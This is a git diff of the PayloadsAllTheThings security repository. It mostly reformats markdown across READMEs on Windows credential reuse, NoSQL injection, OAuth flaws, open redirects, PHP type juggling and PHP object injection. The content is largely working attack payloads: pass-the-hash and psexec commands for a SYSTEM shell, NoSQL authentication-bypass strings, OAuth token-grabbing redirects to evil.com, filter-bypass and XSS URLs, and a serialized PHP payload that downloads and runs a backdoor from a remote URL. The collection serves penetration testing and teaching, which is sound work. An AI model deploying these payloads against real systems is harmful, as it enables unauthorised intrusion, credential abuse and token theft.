 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
 ```
 Note: you may need to enable it with the following command
 ```powershell
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 netsh firewall set service remoteadmin enable
@@ -81,45 +94,51 @@ netsh firewall set service remotedesktop enable
 ```
 or with psexec(sysinternals)
 ```powershell
 psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 ```
 or with crackmapexec
 ```powershell
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
 For Server 2012 R2, Win8.1+
-```
+
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
 ```
 with Metasploit
 ```powershell
 run getgui -u admin -p 1234
 ```
 ## Netuse (Windows)
-```
+
 ```powershell
 net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
 C$
 ```
 ## Runas (Windows - Kerberos auth)
-```
+
 ```powershell
 runas /netonly /user:CSCOU\jarrieta "cmd.exe"
 ```
 ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
-```
+
 ```powershell
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
 ```
 ## Thanks
- - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
+
- - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
+- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,10 +1,12 @@
 # NoSQL injection
 NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
 ## Exploit
 Basic authentication bypass using not equal ($ne) or greater ($gt)
-```
+
 ```json
 in URL
 username[$ne]=toto&password[$ne]=toto
@@ -12,17 +14,18 @@ in JSON
 {"username": {"$ne": null}, "password": {"$ne": null} }
 {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
 {"username": {"$gt": undefined}, "password": {"$gt": undefined} }
 ```
 Extract length information
-```
+
 ```json
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 ```
 Extract data information
-```
+
 ```json
 in URL
 username[$ne]=toto&password[$regex]=m.{2}
 username[$ne]=toto&password[$regex]=md.{1}
@@ -38,6 +41,7 @@ in JSON
 ```
 ## Blind NoSQL
 ```python
 import requests
 import urllib3
@@ -59,7 +63,8 @@ while True:
 ```
 ## MongoDB Payloads
-```
+
 ```bash
 true, $where: '1 == 1'
 , $where: '1 == 1'
 $where: '1 == 1'
@@ -79,9 +84,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 [$ne]=1
 ```
 ## Thanks to
- * https://www.dailysecurity.fr/nosql-injections-classique-blind/
+
- * https://www.owasp.org/index.php/Testing_for_NoSQL_injection
+* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
- * https://github.com/cr0hn/nosqlinjection_wordlists
+* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
- * https://zanon.io/posts/nosql-injection-in-mongodb
+* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
 * [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
--- a/OAuth/README.md
+++ b/OAuth/README.md
@@ -1,48 +1,54 @@
 # OAuth 2 - Common vulnerabilities
 ## Grabbing OAuth Token via redirect_uri
 Redirect to a controlled domain to get the access token
-```
+
 ```powershell
 https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
 https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
 ```
 Redirect to an accepted Open URL in to get the access token
-```
+
 ```powershell
 https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
 https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
 ```
 OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect.
 Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
-```
+
 ```powershell
 https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
 ```
 ## Executing XSS via redirect_uri
-```
+
 ```powershell
 https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>
 ```
 ## OAuth private key disclosure
 Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
 ## Authorization Code Rule Violation
-```
+
-The client MUST NOT use the authorization code  more than once.  
+> The client MUST NOT use the authorization code  more than once.  
 If an authorization code is used more than once, the authorization server MUST deny the request 
 and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
 ```
 ## Cross-Site Request Forgery
-Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (https://example.com/callback?code=AUTHORIZATION_CODE). This URL can be used in CSRF attacks. 
+
-```
+Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (`https://example.com/callback?code=AUTHORIZATION_CODE`). This URL can be used in CSRF attacks.
-The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
+
-```
+> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
 ## Thanks to
-* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
+
-* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
+* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
-* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
+* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
-* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
+* [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
 * [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
--- a/redirect/README.md
+++ b/redirect/README.md
@@ -1,82 +1,132 @@
 # Open URL Redirection
-Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
+
 > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
 ## Fuzzing
 Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
 To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
-```
+
 ```powershell
 WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
 ```
 ## Exploitation
 Using a whitelisted domain or keyword
-```
+
 ```powershell
 www.whitelisted.com.evil.com redirect to evil.com
 ```
 Using CRLF to bypass "javascript" blacklisted keyword
-```
+
 ```powershell
 java%0d%0ascript%0d%0a:alert(0)
 ```
 Using "//" to bypass "http" blacklisted keyword
-```
+
 ```powershell
 //google.com
 ```
 Using "https:" to bypass "//" blacklisted keyword
-```
+
 ```powershell
 https:google.com
 ```
 Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
-```
+
 ```powershell
 \/\/google.com/
 /\/google.com/
 ```
 Using "%E3%80%82" to bypass "." blacklisted character
-```
+
 ```powershell
 //google%E3%80%82com
 ```
 Using null byte "%00" to bypass blacklist filter
-```
+
 ```powershell
 //google%00.com
 ```
-Using "@" character, browser will redirect to anything after the "@"
+Using parameter pollution
 ```powershell
 ?next=whitelisted.com&next=google.com
 ```
 Using "@" character, browser will redirect to anything after the "@"
 ```powershell
 http://www.theirsite.com@yoursite.com/
 ```
 Creating folder as their domain
-```
+
 ```powershell
 http://www.yoursite.com/http://www.theirsite.com/
 http://www.yoursite.com/folder/www.folder.com
 ```
 XSS from Open URL - If it's in a JS variable
-```
+
 ```powershell
 ";alert(0);//
 ```
 XSS from data:// wrapper
-```
+
 ```powershell
 http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
 ```
 XSS from javascript:// wrapper
-```
+
 ```powershell
 http://www.example.com/redirect.php?url=javascript:prompt(1)
 ```
 ## Common injection parameters
 ```powershell
 /{payload}
 ?next={payload}
 ?url={payload}
 ?target={payload}
 ?rurl={payload}
 ?dest={payload}
 ?destination={payload}
 ?redir={payload}
 ?redirect_uri={payload}
 ?redirect_url={payload}
 ?redirect={payload}
 /redirect/{payload}
 /cgi-bin/redirect.cgi?{payload}
 /out/{payload}
 /out?{payload}
 ?view={payload}
 /login?to={payload}
 ?image_url={payload}
 ?go={payload}
 ?return={payload}
 ?returnTo={payload}
 ?return_to={payload}
 ?checkout_url={payload}
 ?continue={payload}
 ?return_path={payload}
 ```
 ## Thanks to
 * filedescriptor
-* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
+* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
 * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
--- a/type/README.md
+++ b/type/README.md
@@ -1,6 +1,35 @@
-# PHP Juggling type and magic hashes	
+# PHP Juggling type and magic hashes
-## Exploit
+## Type Juggling
 True statements
 ```php
 var_dump('0010e2' == '1e3');             # true
 var_dump('0xABCdef' == ' 0xABCdef');     # true PHP 5.0 / false PHP 7.0
 var_dump('0xABCdef' == '     0xABCdef'); # true PHP 5.0 / false PHP 7.0
 var_dump('0x01' == 1)                    # true PHP 5.0 / false PHP 7.0
 var_dump('0x1234Ab'       == '1193131');
 '123'  == 123
 '123a' == 123
 'abc'  == 0
 '' == 0 == false == NULL
 '' == 0       # true
 0  == false   # true
 false == NULL # true
 NULL == ''    # true
 ```
 NULL statements
 ```php
 var_dump(sha1([])); # NULL
 var_dump(md5([]));  # NULL
 ```
 ## Magic Hashes - Exploit
 ```php
 <?php
@@ -8,19 +37,15 @@ var_dump(md5('240610708') == md5('QNKCDZO'));
 var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
 var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
 var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
 var_dump('0010e2'         == '1e3');
 var_dump('0x1234Ab'       == '1193131');
 var_dump('0xABCdef'       == '     0xABCdef');
 ?>
 ```
 | Hash | “Magic” Number / String    | Magic Hash                                    | Found By      |
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
 | MD5  | 240610708                  | 0e462097431906509019562988736854              | Michal Spacek |
 | SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
 ## Thanks to
-* http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
+
-* https://www.whitehatsec.com/blog/magic-hashes/
+* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
 * [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
--- a/serialization/README.md
+++ b/serialization/README.md
@@ -1,67 +0,0 @@
 # PHP Object Injection
 PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.	
 ## Exploit with the __wakeup in the unserialize function
 Vulnerable code:
 ```php
 <?php 
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
    if(isset($_REQUEST['r'])){  
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){ 
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
 ?>
 ```
 Payload:
 ```php
 # Basic serialized data
 a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
 # Command execution
 string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
 ```
 ## Others exploits
 Reverse Shell
 ```php
 class PHPObjectInjection
 {
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 ```
 Basic detection
 ```php
 class PHPObjectInjection
 {
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('cat /etc/passwd');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 //O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
 //'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
 ```
 ## Thanks to
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
--- a/README.md
+++ b/README.md
@@ -1,74 +1,112 @@
-# Payloads All The Things 
+# Payloads All The Things
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I <3 pull requests :)    
+I <3 pull requests :)
-You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
+
 You can also contribute with a beer IRL or with `buymeacoffee.com`
 [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
 Every section contains:
-  - README.md - vulnerability description and how to exploit it
+
-  - Intruders - a set of files to give to Burp Intruder
+- README.md - vulnerability description and how to exploit it
-  - Some exploits
+- Intruders - a set of files to give to Burp Intruder
 - Some exploits
 You might also like :
  * [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
    * [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
    * [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
    * [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
    * [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
    * [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
    * [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
    * [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
    * [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
    * [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
  * [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
    * Apache Struts 2 CVE-2017-5638.py
    * Apache Struts 2 CVE-2017-9805.py
    * Drupalgeddon2 CVE-2018-7600.rb
    * Heartbleed CVE-2014-0160.py
    * Shellshock CVE-2014-6271.py
    * Tomcat CVE-2017-12617.py
 - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
  - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
  - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
  - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
  - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
  - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
  - [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)
  - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
  - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
  - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
  - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
  - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
-## Tools
+- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
-* [Kali Linux](https://www.kali.org/)
+  - Apache Struts 2 CVE-2017-5638.py
-* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
+  - Apache Struts 2 CVE-2017-9805.py
-* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum
+  - Drupalgeddon2 CVE-2018-7600.rb
-* [Burp Proxy](https://portswigger.net)
+  - Heartbleed CVE-2014-0160.py
-* [Fiddler](https://www.telerik.com/download/fiddler)
+  - Shellshock CVE-2014-6271.py
-* [DirBuster](https://sourceforge.net/projects/dirbuster/)
+  - Tomcat CVE-2017-12617.py
 * [GoBuster](https://github.com/OJ/gobuster)
 * [Knockpy](https://github.com/guelfoweb/knock)
 * [SQLmap](http://sqlmap.org)
 * [Nikto](https://cirt.net/nikto2)
 * [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner)
 * [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
 * [Wappalyzer](https://wappalyzer.com/download)
 * [Metasploit](https://www.metasploit.com/)
 * [OpenVAS](http://www.openvas.org/)
 ## Try Harder
-## Online Challenges
+Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
 * [Hack The Box](hackthebox.eu/)
 * [Root-Me](https://www.root-me.org)
 * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
 * [W3Challs](https://w3challs.com/)
 * [NewbieContest](https://www.newbiecontest.org/)
 * [Vulnhub](https://www.vulnhub.com/)
 * [The Cryptopals Crypto Challenges](https://cryptopals.com/)
 * [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
 * [alert(1) to win](https://alf.nu/alert1)
 * [Hacksplaining](https://www.hacksplaining.com/exercises)
 * [HackThisSite](https://hackthissite.org)
 * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
 * [Hackers.gg](hackers.gg)
-## Bug Bounty
+- __Bug Bounty Platforms__
-* [HackerOne](https://hackerone.com)
+  - [HackerOne](https://hackerone.com)
-* [BugCrowd](https://bugcrowd.com)
+  - [BugCrowd](https://bugcrowd.com)
-* [Bounty Factory](https://bountyfactory.io)
+  - [Bounty Factory](https://bountyfactory.io)
-* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
+  - [Synack](https://www.synack.com/)
  - [Intigriti](https://www.intigriti.com)
  - [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
 - __Online Platforms__
  - [Hack The Box](hackthebox.eu/)
  - [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
  - [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
  - [Zenk-Security](https://www.zenk-security.com/epreuves.php)
  - [Root-Me](https://www.root-me.org)
  - [W3Challs](https://w3challs.com/)
  - [NewbieContest](https://www.newbiecontest.org/)
  - [Vulnhub](https://www.vulnhub.com/)
  - [The Cryptopals Crypto Challenges](https://cryptopals.com/)
  - [alert(1) to win](https://alf.nu/alert1)
  - [Hacksplaining](https://www.hacksplaining.com/exercises)
  - [HackThisSite](https://hackthissite.org)
  - [Hackers.gg](hackers.gg)
  - [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
 ## Book's list
 Grab a book and relax, these ones are the best security books (in my opinion).
 - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 ## More resources
 ### Blogs/Websites
 - [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
 - [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
 - [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
 - [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
 - [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
 - [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
 ### Youtube
 - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 ### Docker
 ## Docker
 | Command     | Link |
 | :------------- | :------------- |
 | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
@@ -77,43 +115,10 @@ You might also like :
 | `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
 | `docker pull wpscanteam/wpscan`       | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
 | `docker pull infoslack/dvwa`          | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
 | `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) |
 | `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
 | `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
 | `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
 | `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
 | `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
-| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
+| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
 ## More resources
 ### Book's list:
 * [Web Hacking 101](https://leanpub.com/web-hacking-101)
 * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
